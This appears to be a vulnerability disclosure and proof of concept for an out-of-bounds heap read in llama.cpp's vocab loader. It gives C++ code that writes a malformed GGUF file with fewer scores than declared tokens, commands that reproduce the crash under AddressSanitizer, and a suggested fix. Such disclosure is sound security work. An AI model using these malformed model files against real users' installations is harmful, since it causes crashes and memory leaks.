llama.cpp Vocab OOB Read PoC
Proof of concept for heap-buffer-overflow read in llama.cpp vocab loading.
Vulnerability: llama-vocab.cpp:2128 reads the scores[] and toktypes[] arrays
using indices up to n_tokens without validating that the array sizes match the token count.
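The pattern can be sketched as follows. This is an illustrative reconstruction, not the actual llama.cpp code: the struct `VocabArrays` and the function `load_vocab_checked` are hypothetical names, and the fix shown (validating array sizes before the indexing loop) is the obvious remediation, not necessarily the one upstream adopted.

```cpp
#include <cassert>
#include <cstdint>
#include <stdexcept>
#include <vector>

// Hypothetical reconstruction: the loader takes n_tokens from the
// tokenizer.ggml.tokens array, then indexes scores and toktypes, which are
// read from separate, independently sized GGUF metadata keys.
struct VocabArrays {
    std::vector<float>   scores;   // from tokenizer.ggml.scores
    std::vector<int32_t> toktypes; // from tokenizer.ggml.token_type
};

// Unsafe pattern: scores[i] / toktypes[i] read past the end of the heap
// buffer when those arrays hold fewer than n_tokens entries:
//
//     for (uint32_t i = 0; i < n_tokens; i++) {
//         float score = scores[i];  // OOB read if scores.size() < n_tokens
//         ...
//     }

// Sketch of a fix: validate the array sizes against n_tokens up front.
void load_vocab_checked(const VocabArrays & v, size_t n_tokens) {
    if (v.scores.size() != n_tokens || v.toktypes.size() != n_tokens) {
        throw std::runtime_error("vocab array size mismatch");
    }
    for (size_t i = 0; i < n_tokens; i++) {
        volatile float score = v.scores[i]; // in-bounds by construction
        (void) score;
    }
}
```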
File: poc_vocab_oob.gguf (1,715 bytes): declares 100 tokens but supplies only 5 scores
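A file with this shape of mismatch can be produced with a handful of binary writes, following the GGUF v3 layout (magic, version, tensor count, metadata key/value pairs). The sketch below is illustrative, not a byte-for-byte reproduction of poc_vocab_oob.gguf: the helper names are made up, and a file that llama.cpp actually loads far enough to hit the bug would also need additional metadata keys (e.g. general.architecture) that are omitted here for brevity.

```cpp
#include <cstdint>
#include <fstream>
#include <string>

// GGUF v3 metadata value type tags (from the GGUF specification).
enum : uint32_t { GGUF_FLOAT32 = 6, GGUF_STRING = 8, GGUF_ARRAY = 9 };

static void put_u32(std::ofstream & f, uint32_t v) {
    f.write(reinterpret_cast<const char *>(&v), 4);
}
static void put_u64(std::ofstream & f, uint64_t v) {
    f.write(reinterpret_cast<const char *>(&v), 8);
}
static void put_str(std::ofstream & f, const std::string & s) {
    put_u64(f, s.size()); // GGUF strings: uint64 length, then raw bytes
    f.write(s.data(), s.size());
}

// Writes a GGUF file whose tokenizer.ggml.tokens array declares n_tokens
// entries while tokenizer.ggml.scores carries only n_scores floats.
void write_mismatched_gguf(const std::string & path,
                           uint64_t n_tokens, uint64_t n_scores) {
    std::ofstream f(path, std::ios::binary);
    f.write("GGUF", 4);      // magic
    put_u32(f, 3);           // version 3
    put_u64(f, 0);           // tensor count
    put_u64(f, 3);           // metadata kv count

    put_str(f, "tokenizer.ggml.model");
    put_u32(f, GGUF_STRING);
    put_str(f, "llama");

    put_str(f, "tokenizer.ggml.tokens");
    put_u32(f, GGUF_ARRAY);
    put_u32(f, GGUF_STRING); // element type
    put_u64(f, n_tokens);
    for (uint64_t i = 0; i < n_tokens; i++) {
        put_str(f, "t" + std::to_string(i));
    }

    put_str(f, "tokenizer.ggml.scores");
    put_u32(f, GGUF_ARRAY);
    put_u32(f, GGUF_FLOAT32);
    put_u64(f, n_scores);    // fewer entries than n_tokens
    for (uint64_t i = 0; i < n_scores; i++) {
        float s = 0.0f;
        f.write(reinterpret_cast<const char *>(&s), 4);
    }
}
```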
Reproduce:
git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp
mkdir build && cd build
cmake .. -DCMAKE_BUILD_TYPE=Debug -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address"
cmake --build . --target llama-tokenize -j$(nproc)
./bin/llama-tokenize -m poc_vocab_oob.gguf -p "hello"
Expected: ASAN reports heap-buffer-overflow at llama-vocab.cpp:2128